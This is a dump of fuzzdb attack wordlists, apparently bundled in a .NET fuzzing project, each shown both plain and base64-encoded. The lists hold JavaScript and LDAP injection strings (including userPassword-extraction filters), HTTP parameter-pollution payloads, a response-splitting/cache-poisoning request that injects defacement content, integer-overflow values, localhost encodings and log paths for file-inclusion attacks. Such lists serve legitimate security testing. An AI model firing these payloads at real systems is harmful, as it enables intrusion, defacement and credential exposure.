--------------------------------------------------------------------------------
1 | onafterprint
2 | onbeforeprint
3 | onbeforeonload
4 | onblur
5 | onerror
6 | onfocus
7 | onhaschange
8 | onload
9 | onmessage
10 | onoffline
11 | ononline
12 | onpagehide
13 | onpageshow
14 | onpopstate
15 | onredo
16 | onresize
17 | onstorage
18 | onundo
19 | onunload
20 | onblur
21 | onchange
22 | oncontextmenu
23 | onfocus
24 | onformchange
25 | onforminput
26 | oninput
27 | oninvalid
28 | onreset
29 | onselect
30 | onsubmit
31 | onkeydown
32 | onkeypress
33 | onkeyup
34 | onclick
35 | ondblclick
36 | ondrag
37 | ondragend
38 | ondragenter
39 | ondragleave
40 | ondragover
41 | ondragstart
42 | ondrop
43 | onmousedown
44 | onmousemove
45 | onmouseout
46 | onmouseover
47 | onmouseup
48 | onmousewheel
49 | onscroll
50 | onabort
51 | oncanplay
52 | oncanplaythrough
53 | ondurationchange
54 | onemptied
55 | onended
56 | onerror
57 | onloadeddata
58 | onloadedmetadata
59 | onloadedstart
60 | onpause
61 | onplay
62 | onplaying
63 | onprogress
64 | onratechange
65 | onreadystatechange
66 | onseeked
67 | onseeking
68 | onstalled
69 | onsuspend
70 | ontimeupdate
71 | onvolumechange
72 | onwaiting
73 | style
74 |
75 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/javascript_events.txt.base64:
--------------------------------------------------------------------------------
1 | b25hZnRlcnByaW50DQpvbmJlZm9yZXByaW50DQpvbmJlZm9yZW9ubG9hZA0Kb25ibHVyDQpvbmVycm9yDQpvbmZvY3VzDQpvbmhhc2NoYW5nZQ0Kb25sb2FkDQpvbm1lc3NhZ2UNCm9ub2ZmbGluZQ0Kb25vbmxpbmUNCm9ucGFnZWhpZGUNCm9ucGFnZXNob3cNCm9ucG9wc3RhdGUNCm9ucmVkbw0Kb25yZXNpemUNCm9uc3RvcmFnZQ0Kb251bmRvDQpvbnVubG9hZA0Kb25ibHVyDQpvbmNoYW5nZQ0Kb25jb250ZXh0bWVudQ0Kb25mb2N1cw0Kb25mb3JtY2hhbmdlDQpvbmZvcm1pbnB1dA0Kb25pbnB1dA0Kb25pbnZhbGlkDQpvbnJlc2V0DQpvbnNlbGVjdA0Kb25zdWJtaXQNCm9ua2V5ZG93bg0Kb25rZXlwcmVzcw0Kb25rZXl1cA0Kb25jbGljaw0Kb25kYmxjbGljaw0Kb25kcmFnDQpvbmRyYWdlbmQNCm9uZHJhZ2VudGVyDQpvbmRyYWdsZWF2ZQ0Kb25kcmFnb3Zlcg0Kb25kcmFnc3RhcnQNCm9uZHJvcA0Kb25tb3VzZWRvd24NCm9ubW91c2Vtb3ZlDQpvbm1vdXNlb3V0DQpvbm1vdXNlb3Zlcg0Kb25tb3VzZXVwDQpvbm1vdXNld2hlZWwNCm9uc2Nyb2xsDQpvbmFib3J0DQpvbmNhbnBsYXkNCm9uY2FucGxheXRocm91Z2gNCm9uZHVyYXRpb25jaGFuZ2UNCm9uZW1wdGllZA0Kb25lbmRlZA0Kb25lcnJvcg0Kb25sb2FkZWRkYXRhDQpvbmxvYWRlZG1ldGFkYXRhDQpvbmxvYWRlZHN0YXJ0DQpvbnBhdXNlDQpvbnBsYXkNCm9ucGxheWluZw0Kb25wcm9ncmVzcw0Kb25yYXRlY2hhbmdlDQpvbnJlYWR5c3RhdGVjaGFuZ2UNCm9uc2Vla2VkDQpvbnNlZWtpbmcNCm9uc3RhbGxlZA0Kb25zdXNwZW5kDQpvbnRpbWV1cGRhdGUNCm9udm9sdW1lY2hhbmdlDQpvbndhaXRpbmcNCnN0eWxlDQoNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/js_inject.txt:
--------------------------------------------------------------------------------
1 | function(){ return this.userid}
2 | ' function(){ return this.username} or '1'='1
3 | function(){return version()}
4 | function(){return version}
5 | t'; return this; var d='!
6 | " function(){ return this} or '1'='1
7 | t"; return this; var d='!
8 | ' || this || '1'=='1
9 | ' || this.version || '1'=='1
10 | ' || '1'=='1
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/js_inject.txt.base64:
--------------------------------------------------------------------------------
1 | ZnVuY3Rpb24oKXsgcmV0dXJuIHRoaXMudXNlcmlkfQ0KJyBmdW5jdGlvbigpeyByZXR1cm4gdGhpcy51c2VybmFtZX0gb3IgJzEnPScxDQpmdW5jdGlvbigpe3JldHVybiB2ZXJzaW9uKCl9DQpmdW5jdGlvbigpe3JldHVybiB2ZXJzaW9ufQ0KdCc7IHJldHVybiB0aGlzOyB2YXIgZD0nIQ0KIiBmdW5jdGlvbigpeyByZXR1cm4gdGhpc30gb3IgJzEnPScxDQp0IjsgcmV0dXJuIHRoaXM7IHZhciBkPSchDQonIHx8IHRoaXMgfHwgJzEnPT0nMQ0KJyB8fCB0aGlzLnZlcnNpb24gfHwgJzEnPT0nMQ0KJyB8fCAnMSc9PScxDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/quotationmarks.txt:
--------------------------------------------------------------------------------
1 | '
2 | "
3 | ''
4 | ""
5 | '"'
6 | "''''"'"
7 | "'"'"''''"
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/quotationmarks.txt.base64:
--------------------------------------------------------------------------------
1 | Jw0KIg0KJycNCiIiDQonIicNCiInJycnIiciDQoiJyInIicnJyciDQo8Zm9vIHZhbD3DouKCrMWTYmFyw6LigqzCnSAvPg0KPGZvbyB2YWw9w6LigqzFk2JhcsOi4oKswp0gLz4NCjxmb28gdmFsPcOi4oKswp1iYXLDouKCrMWTIC8+DQo8Zm9vIHZhbD1gYmFyJyAvPg0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/README.md:
--------------------------------------------------------------------------------
1 | References:
2 |
3 | http://ha.ckers.org/response-splitting.html
4 |
5 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/docs.http-method-defs.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/http-protocol/docs.http-method-defs.html
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/hpp.txt:
--------------------------------------------------------------------------------
1 | # HTTP paramter polution and interpretation payloads by Jacco van Tuijl
2 | ?id=id=1
3 | &id=1?id=2
4 | ?id['&id=1']=2
5 | ?id[1&id=2]=1
6 | ?id=1&id=2
7 | &id=1&id=2
8 | ?id=1%26id%3D2
9 | ?id&id=1
10 | ????id=1
11 | &&&&id=1
12 | ?id=id['1']=2
13 | ?id=1#id=2
14 | ?id==1
15 | ?id===1
16 | ;id=1?id=2
17 | ?id;id=1
18 | &id=1;id=2
19 | #id=1?id=2&id=3
20 | ?id=1,2
21 | ?id1,id2=1
22 | ?id[=1&id=2]=3
23 | ?id[&id=2]=1
24 | ?id=[1,2]
25 | ?id&=1
26 | ?id[]=1&id=2
27 | ?id=/:@&=+$&id=2
28 | ?id[=/:@&=+$&id=2]=1
29 | ?id={id:{id:1},2}
30 | ?id[{id:{id[]:1},2}]=3
31 | ?id=%23?id=1
32 | ?id=1%26id=2
33 | ?id=1%2526id=2
34 | ?id=1%c0%a6id=2
35 | ?id=1\uc0a6id=2
36 | ?id=1&id=2
37 | ?id=1&id=2
38 | ?id=1%u0026;id=2
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/hpp.txt.base64:
--------------------------------------------------------------------------------
1 | IyBIVFRQIHBhcmFtdGVyIHBvbHV0aW9uIGFuZCBpbnRlcnByZXRhdGlvbiBwYXlsb2FkcyBieSBKYWNjbyB2YW4gVHVpamwNCj9pZD1pZD0xDQomaWQ9MT9pZD0yDQo/aWRbJyZpZD0xJ109Mg0KP2lkWzEmaWQ9Ml09MQ0KP2lkPTEmaWQ9Mg0KJmlkPTEmaWQ9Mg0KP2lkPTElMjZpZCUzRDINCj9pZCZpZD0xDQo/Pz8/aWQ9MQ0KJiYmJmlkPTENCj9pZD1pZFsnMSddPTINCj9pZD0xI2lkPTINCj9pZD09MQ0KP2lkPT09MQ0KO2lkPTE/aWQ9Mg0KP2lkO2lkPTENCiZpZD0xO2lkPTINCiNpZD0xP2lkPTImaWQ9Mw0KP2lkPTEsMg0KP2lkMSxpZDI9MQ0KP2lkWz0xJmlkPTJdPTMNCj9pZFsmaWQ9Ml09MQ0KP2lkPVsxLDJdDQo/aWQmPTENCj9pZFtdPTEmaWQ9Mg0KP2lkPS86QCY9KyQmaWQ9Mg0KP2lkWz0vOkAmPSskJmlkPTJdPTENCj9pZD17aWQ6e2lkOjF9LDJ9DQo/aWRbe2lkOntpZFtdOjF9LDJ9XT0zDQo/aWQ9JTIzP2lkPTENCj9pZD0xJTI2aWQ9Mg0KP2lkPTElMjUyNmlkPTINCj9pZD0xJWMwJWE2aWQ9Mg0KP2lkPTFcdWMwYTZpZD0yDQo/aWQ9MSZhbXA7aWQ9Mg0KP2lkPTEmIzM4O2lkPTINCj9pZD0xJXUwMDI2O2lkPTI=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-header-cache-poison.txt:
--------------------------------------------------------------------------------
1 | # Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010)
2 | # creative commons license http://creativecommons.org/licenses/by/3.0/
3 | # projurl
4 | GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1
5 | %0d%0aX-Injection-Header:%20AttackValue
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-header-cache-poison.txt.base64:
--------------------------------------------------------------------------------
1 | IyBIZWFkZXIgSW5qZWN0aW9uIC8gQ2FjaGUgUG9pc29uIDEuMCAgKGZ1enogdGhlIGVudGlyZSBnZXQgcmVxKSAoMTIgQXByaWwgMjAxMCkNCiMgY3JlYXRpdmUgY29tbW9ucyBsaWNlbnNlIGh0dHA6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LzMuMC8NCiMgcHJvanVybA0KR0VUIGh0dHA6Ly97U0lURX10ZXN0c2l0ZS5jb20vcmVkaXIucGhwP3NpdGU9JTBkJTBhQ29udGVudC1MZW5ndGg6JTIwMCUwZCUwYSUwZCUwYUhUVFAvMS4xJTIwMjAwJTIwT0slMGQlMGFMYXN0LU1vZGlmaWVkOiUyME1vbiwlMjAyNyUyME9jdCUyMDIwMDklMjAxNDo1MDoxOCUyMEdNVCUwZCUwYUNvbnRlbnQtTGVuZ3RoOiUyMDIwJTBkJTBhQ29udGVudC1UeXBlOiUyMHRleHQvaHRtbCUwZCUwYSUwZCUwYTxodG1sPmRlZmFjZSE8L2h0bWw+IEhUVFAvMS4xR0VUIGh0dHA6Ly97U0lURX0ve1JFRElSRUNUVVJMfT9zaXRlPSUwZCUwYUNvbnRlbnQtTGVuZ3RoOiUyMDAlMGQlMGElMGQlMGFIVFRQLzEuMSUyMDIwMCUyME9LJTBkJTBhTGFzdC1Nb2RpZmllZDolMjBNb24sJTIwMjclMjBPY3QlMjAyMDA5JTIwMTQ6NTA6MTglMjBHTVQlMGQlMGFDb250ZW50LUxlbmd0aDolMjAyMCUwZCUwYUNvbnRlbnQtVHlwZTolMjB0ZXh0L2h0bWwlMGQlMGElMGQlMGE8aHRtbD5kZWZhY2UhPC9odG1sPiBIVFRQLzEuMQ0KJTBkJTBhWC1JbmplY3Rpb24tSGVhZGVyOiUyMEF0dGFja1ZhbHVlDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-protocol-methods.txt:
--------------------------------------------------------------------------------
1 | OPTIONS
2 | GET
3 | HEAD
4 | POST
5 | PUT
6 | DELETE
7 | TRACE
8 | TRACK
9 | CONNECT
10 | PROPFIND
11 | PROPPATCH
12 | MKCOL
13 | COPY
14 | MOVE
15 | LOCK
16 | UNLOCK
17 | VERSION-CONTROL
18 | REPORT
19 | CHECKOUT
20 | CHECKIN
21 | UNCHECKOUT
22 | MKWORKSPACE
23 | UPDATE
24 | LABEL
25 | MERGE
26 | BASELINE-CONTROL
27 | MKACTIVITY
28 | ORDERPATCH
29 | ACL
30 | PATCH
31 | SEARCH
32 | ARBITRARY
33 | BCOPY
34 | BDELETE
35 | BMOVE
36 | BPROPFIND
37 | BPROPPATCH
38 | DEBUG
39 | INDEX
40 | NOTIFY
41 | POLL
42 | RPC_IN_DATA
43 | RPC_OUT_DATA
44 | SUBSCRIBE
45 | UNSUBSCRIBE
46 | X-MS-ENUMATTS
47 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-protocol-methods.txt.base64:
--------------------------------------------------------------------------------
1 | T1BUSU9OUw0KR0VUDQpIRUFEDQpQT1NUDQpQVVQNCkRFTEVURQ0KVFJBQ0UNClRSQUNLDQpDT05ORUNUDQpQUk9QRklORA0KUFJPUFBBVENIDQpNS0NPTA0KQ09QWQ0KTU9WRQ0KTE9DSw0KVU5MT0NLDQpWRVJTSU9OLUNPTlRST0wNClJFUE9SVA0KQ0hFQ0tPVVQNCkNIRUNLSU4NClVOQ0hFQ0tPVVQNCk1LV09SS1NQQUNFDQpVUERBVEUNCkxBQkVMDQpNRVJHRQ0KQkFTRUxJTkUtQ09OVFJPTA0KTUtBQ1RJVklUWQ0KT1JERVJQQVRDSA0KQUNMDQpQQVRDSA0KU0VBUkNIDQpBUkJJVFJBUlkNCkJDT1BZDQpCREVMRVRFDQpCTU9WRQ0KQlBST1BGSU5EDQpCUFJPUFBBVENIDQpERUJVRw0KSU5ERVgNCk5PVElGWQ0KUE9MTA0KUlBDX0lOX0RBVEENClJQQ19PVVRfREFUQQ0KU1VCU0NSSUJFDQpVTlNVQlNDUklCRQ0KWC1NUy1FTlVNQVRUUw0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-request-header-field-names.txt:
--------------------------------------------------------------------------------
1 | Accept
2 | Accept-Charset
3 | Accept-Encoding
4 | Accept-Language
5 | Accept-Datetime
6 | Authorization
7 | Cache-Control
8 | Connection
9 | Cookie
10 | Content-Length
11 | Content-MD5
12 | Content-Type
13 | Date
14 | Expect
15 | From
16 | Host
17 | If-Match
18 | If-Modified-Since
19 | If-None-Match
20 | If-Range
21 | If-Unmodified-Since
22 | Max-Forwards
23 | Origin
24 | Pragma
25 | Proxy-Authorization
26 | Range
27 | Referer
28 | TE
29 | User-Agent
30 | Upgrade
31 | Via
32 | Warning
33 | X-Requested-With
34 | DNT
35 | X-Forwarded-For
36 | X-Forwarded-Host
37 | X-Forwarded-Proto
38 | Front-End-Https
39 | X-Http-Method-Override
40 | X-ATT-DeviceId
41 | X-Wap-Profile
42 | Proxy-Connection
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-request-header-field-names.txt.base64:
--------------------------------------------------------------------------------
1 | QWNjZXB0DQpBY2NlcHQtQ2hhcnNldA0KQWNjZXB0LUVuY29kaW5nDQpBY2NlcHQtTGFuZ3VhZ2UNCkFjY2VwdC1EYXRldGltZQ0KQXV0aG9yaXphdGlvbg0KQ2FjaGUtQ29udHJvbA0KQ29ubmVjdGlvbg0KQ29va2llDQpDb250ZW50LUxlbmd0aA0KQ29udGVudC1NRDUNCkNvbnRlbnQtVHlwZQ0KRGF0ZQ0KRXhwZWN0DQpGcm9tDQpIb3N0DQpJZi1NYXRjaA0KSWYtTW9kaWZpZWQtU2luY2UNCklmLU5vbmUtTWF0Y2gNCklmLVJhbmdlDQpJZi1Vbm1vZGlmaWVkLVNpbmNlDQpNYXgtRm9yd2FyZHMNCk9yaWdpbg0KUHJhZ21hDQpQcm94eS1BdXRob3JpemF0aW9uDQpSYW5nZQ0KUmVmZXJlcg0KVEUNClVzZXItQWdlbnQNClVwZ3JhZGUNClZpYQ0KV2FybmluZw0KWC1SZXF1ZXN0ZWQtV2l0aA0KRE5UDQpYLUZvcndhcmRlZC1Gb3INClgtRm9yd2FyZGVkLUhvc3QNClgtRm9yd2FyZGVkLVByb3RvDQpGcm9udC1FbmQtSHR0cHMNClgtSHR0cC1NZXRob2QtT3ZlcnJpZGUNClgtQVRULURldmljZUlkDQpYLVdhcC1Qcm9maWxlDQpQcm94eS1Db25uZWN0aW9u
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-response-header-field-names.txt:
--------------------------------------------------------------------------------
1 | Access-Control-Allow-Origin
2 | Accept-Ranges
3 | Age
4 | Allow
5 | Cache-Control
6 | Connection
7 | Content-Encoding
8 | Content-Language
9 | Content-Length
10 | Content-Location
11 | Content-MD5
12 | Content-Disposition
13 | Content-Range
14 | Content-Type
15 | Date
16 | ETag
17 | Expires
18 | Last-Modified
19 | Link
20 | Location
21 | P3P
22 | Pragma
23 | Proxy-Authenticate
24 | Refresh
25 | Retry-After
26 | Server
27 | Set-Cookie
28 | Status
29 | Strict-Transport-Security
30 | Trailer
31 | Transfer-Encoding
32 | Upgrade
33 | Vary
34 | Via
35 | Warning
36 | WWW-Authenticate
37 | X-Frame-Options
38 | Public-Key-Pins
39 | X-XSS-Protection
40 | Content-Security-Policy
41 | X-Content-Security-Policy
42 | X-WebKit-CSP
43 | X-Content-Type-Options
44 | X-Powered-By
45 | X-UA-Compatible
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-response-header-field-names.txt.base64:
--------------------------------------------------------------------------------
1 | QWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luDQpBY2NlcHQtUmFuZ2VzDQpBZ2UNCkFsbG93DQpDYWNoZS1Db250cm9sDQpDb25uZWN0aW9uDQpDb250ZW50LUVuY29kaW5nDQpDb250ZW50LUxhbmd1YWdlDQpDb250ZW50LUxlbmd0aA0KQ29udGVudC1Mb2NhdGlvbg0KQ29udGVudC1NRDUNCkNvbnRlbnQtRGlzcG9zaXRpb24NCkNvbnRlbnQtUmFuZ2UNCkNvbnRlbnQtVHlwZQ0KRGF0ZQ0KRVRhZw0KRXhwaXJlcw0KTGFzdC1Nb2RpZmllZA0KTGluaw0KTG9jYXRpb24NClAzUA0KUHJhZ21hDQpQcm94eS1BdXRoZW50aWNhdGUNClJlZnJlc2gNClJldHJ5LUFmdGVyDQpTZXJ2ZXINClNldC1Db29raWUNClN0YXR1cw0KU3RyaWN0LVRyYW5zcG9ydC1TZWN1cml0eQ0KVHJhaWxlcg0KVHJhbnNmZXItRW5jb2RpbmcNClVwZ3JhZGUNClZhcnkNClZpYQ0KV2FybmluZw0KV1dXLUF1dGhlbnRpY2F0ZQ0KWC1GcmFtZS1PcHRpb25zDQpQdWJsaWMtS2V5LVBpbnMNClgtWFNTLVByb3RlY3Rpb24NCkNvbnRlbnQtU2VjdXJpdHktUG9saWN5DQpYLUNvbnRlbnQtU2VjdXJpdHktUG9saWN5DQpYLVdlYktpdC1DU1ANClgtQ29udGVudC1UeXBlLU9wdGlvbnMNClgtUG93ZXJlZC1CeQ0KWC1VQS1Db21wYXRpYmxl
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/integer-overflow/integer-overflows.txt:
--------------------------------------------------------------------------------
1 | -1
2 | 0
3 | 0x100
4 | 0x1000
5 | 0x3fffffff
6 | 0x7ffffffe
7 | 0x7fffffff
8 | 0x80000000
9 | 0xfffffffe
10 | 0xffffffff
11 | 0x10000
12 | 0x100000
13 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/integer-overflow/integer-overflows.txt.base64:
--------------------------------------------------------------------------------
1 | LTENCjANCjB4MTAwDQoweDEwMDANCjB4M2ZmZmZmZmYNCjB4N2ZmZmZmZmUNCjB4N2ZmZmZmZmYNCjB4ODAwMDAwMDANCjB4ZmZmZmZmZmUNCjB4ZmZmZmZmZmYNCjB4MTAwMDANCjB4MTAwMDAwDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ip/localhost.txt:
--------------------------------------------------------------------------------
1 | 127.0.0.1
2 | 127.0.0.2
3 | 127.1
4 | 127.2
5 | ::1
6 | 0:0:0:0:0:0:0:1
7 | 0:0:0:000:0:0:0:1
8 | 0000:0000:0000:0000:0000:0000:0000:0001
9 | 2130706433
10 | 2130706434
11 | 7F000001
12 | 7F000002
13 | localhost
14 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ip/localhost.txt.base64:
--------------------------------------------------------------------------------
1 | MTI3LjAuMC4xDQoxMjcuMC4wLjINCjEyNy4xDQoxMjcuMg0KOjoxDQowOjA6MDowOjA6MDowOjENCjA6MDowOjAwMDowOjA6MDoxDQowMDAwOjAwMDA6MDAwMDowMDAwOjAwMDA6MDAwMDowMDAwOjAwMDENCjIxMzA3MDY0MzMNCjIxMzA3MDY0MzQNCjdGMDAwMDAxDQo3RjAwMDAwMg0KbG9jYWxob3N0DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ldap/README.md:
--------------------------------------------------------------------------------
1 | tool:
2 | http://code.google.com/p/ldap-blind-explorer/
3 |
4 | video:
5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ldap/ldap-injection.txt:
--------------------------------------------------------------------------------
1 | !
2 | %21
3 | %26
4 | %28
5 | %29
6 | %2A%28%7C%28mail%3D%2A%29%29
7 | %2A%28%7C%28objectclass%3D%2A%29%29
8 | %2A%7C
9 | %7C
10 | \21
11 | \26
12 | \28
13 | \29
14 | &
15 | (
16 | )
17 | *
18 | *()|%26'
19 | *()|&'
20 | *(|(mail=*))
21 | *(|(objectclass=*))
22 | *)(uid=*))(|(uid=*
23 | (*)*)
24 | *)*
25 | */*
26 | *|
27 | /
28 | //
29 | //*
30 | @*
31 | |
32 | admin*
33 | admin*)((|userpassword=*)
34 | admin*)((|userPassword=*)
35 | x' or name()='username' or 'x'='y
36 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ldap/ldap-injection.txt.base64:
--------------------------------------------------------------------------------
1 | IQ0KJTIxDQolMjYNCiUyOA0KJTI5DQolMkElMjglN0MlMjhtYWlsJTNEJTJBJTI5JTI5DQolMkElMjglN0MlMjhvYmplY3RjbGFzcyUzRCUyQSUyOSUyOQ0KJTJBJTdDDQolN0MNClwyMQ0KXDI2DQpcMjgNClwyOQ0KJg0KKA0KKQ0KKg0KKigpfCUyNicNCiooKXwmJw0KKih8KG1haWw9KikpDQoqKHwob2JqZWN0Y2xhc3M9KikpDQoqKSh1aWQ9KikpKHwodWlkPSoNCigqKSopDQoqKSoNCiovKg0KKnwNCi8NCi8vDQovLyoNCkAqDQp8DQphZG1pbioNCmFkbWluKikoKHx1c2VycGFzc3dvcmQ9KikNCmFkbWluKikoKHx1c2VyUGFzc3dvcmQ9KikNCngnIG9yIG5hbWUoKT0ndXNlcm5hbWUnIG9yICd4Jz0neQ0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-ms-httpd-log-locations.txt:
--------------------------------------------------------------------------------
1 | \Program Files\Apache Group\Apache\logs\access.log
2 | \Program Files\Apache Group\Apache\logs\error.log
3 | \Program Files\Apache Group\Apache\conf\httpd.conf
4 | \Program Files\Apache Group\Apache2\conf\httpd.conf
5 | \Program Files (x86)\Apache Group\Apache\logs\access.log
6 | \Program Files (x86)\Apache Group\Apache\logs\error.log
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-ms-httpd-log-locations.txt.base64:
--------------------------------------------------------------------------------
1 | XFByb2dyYW0gRmlsZXNcQXBhY2hlIEdyb3VwXEFwYWNoZVxsb2dzXGFjY2Vzcy5sb2cNClxQcm9ncmFtIEZpbGVzXEFwYWNoZSBHcm91cFxBcGFjaGVcbG9nc1xlcnJvci5sb2cNClxQcm9ncmFtIEZpbGVzXEFwYWNoZSBHcm91cFxBcGFjaGVcY29uZlxodHRwZC5jb25mDQpcUHJvZ3JhbSBGaWxlc1xBcGFjaGUgR3JvdXBcQXBhY2hlMlxjb25mXGh0dHBkLmNvbmYNClxQcm9ncmFtIEZpbGVzICh4ODYpXEFwYWNoZSBHcm91cFxBcGFjaGVcbG9nc1xhY2Nlc3MubG9nDQpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxBcGFjaGUgR3JvdXBcQXBhY2hlXGxvZ3NcZXJyb3IubG9nDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-unix-httpd-log-locations.txt:
--------------------------------------------------------------------------------
1 | /apache/logs/error.log
2 | /apache/logs/access.log
3 | /apache/logs/error.log
4 | /apache/logs/access.log
5 | /apache/logs/error.log
6 | /apache/logs/access.log
7 | /etc/httpd/logs/acces_log
8 | /etc/httpd/logs/acces.log
9 | /etc/httpd/logs/error_log
10 | /etc/httpd/logs/error.log
11 | /var/www/logs/access_log
12 | /var/www/logs/access.log
13 | /usr/local/apache/logs/access_log
14 | /usr/local/apache/logs/access.log
15 | /var/log/apache/access_log
16 | /var/log/apache2/access_log
17 | /var/log/apache/access.log
18 | /var/log/apache2/access.log
19 | /var/log/access_log
20 | /var/log/access.log
21 | /var/www/logs/error_log
22 | /var/www/logs/error.log
23 | /usr/local/apache/logs/error_log
24 | /usr/local/apache/logs/error.log
25 | /var/log/apache/error_log
26 | /var/log/apache2/error_log
27 | /var/log/apache/error.log
28 | /var/log/apache2/error.log
29 | /var/log/error_log
30 | /var/log/error.log
31 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-unix-httpd-log-locations.txt.base64:
--------------------------------------------------------------------------------
1 | L2FwYWNoZS9sb2dzL2Vycm9yLmxvZyANCi9hcGFjaGUvbG9ncy9hY2Nlc3MubG9nIA0KL2FwYWNoZS9sb2dzL2Vycm9yLmxvZyANCi9hcGFjaGUvbG9ncy9hY2Nlc3MubG9nIA0KL2FwYWNoZS9sb2dzL2Vycm9yLmxvZyANCi9hcGFjaGUvbG9ncy9hY2Nlc3MubG9nIA0KL2V0Yy9odHRwZC9sb2dzL2FjY2VzX2xvZyANCi9ldGMvaHR0cGQvbG9ncy9hY2Nlcy5sb2cgDQovZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nIA0KL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZyANCi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZyANCi92YXIvd3d3L2xvZ3MvYWNjZXNzLmxvZyANCi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZyANCi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzLmxvZyANCi92YXIvbG9nL2FwYWNoZS9hY2Nlc3NfbG9nIA0KL3Zhci9sb2cvYXBhY2hlMi9hY2Nlc3NfbG9nIA0KL3Zhci9sb2cvYXBhY2hlL2FjY2Vzcy5sb2cgDQovdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2cgDQovdmFyL2xvZy9hY2Nlc3NfbG9nIA0KL3Zhci9sb2cvYWNjZXNzLmxvZyANCi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nIA0KL3Zhci93d3cvbG9ncy9lcnJvci5sb2cgDQovdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZyANCi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nIA0KL3Zhci9sb2cvYXBhY2hlL2Vycm9yX2xvZyANCi92YXIvbG9nL2FwYWNoZTIvZXJyb3JfbG9nIA0KL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZyANCi92YXIvbG9nL2FwYWNoZTIvZXJyb3IubG9nIA0KL3Zhci9sb2cvZXJyb3JfbG9nIA0KL3Zhci9sb2cvZXJyb3IubG9nIA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/no-sql-injection/Readme.md:
--------------------------------------------------------------------------------
1 | NoSQL Hacking Docs
2 | ==================
3 | - https://www.owasp.org/index.php/Testing_for_NoSQL_injection
4 | - https://arxiv.org/pdf/1506.04082.pdf
5 | - https://pentesterlab.com/exercises/web_for_pentester_II/course
6 | - https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_sql_and_nosql_injection.html
7 | - https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf
8 | - http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
9 |
10 | NoSQL Hacking Tools
11 | ===================
12 | - http://nosqlmap.net/index.html
13 |
14 | Credits
15 | =======
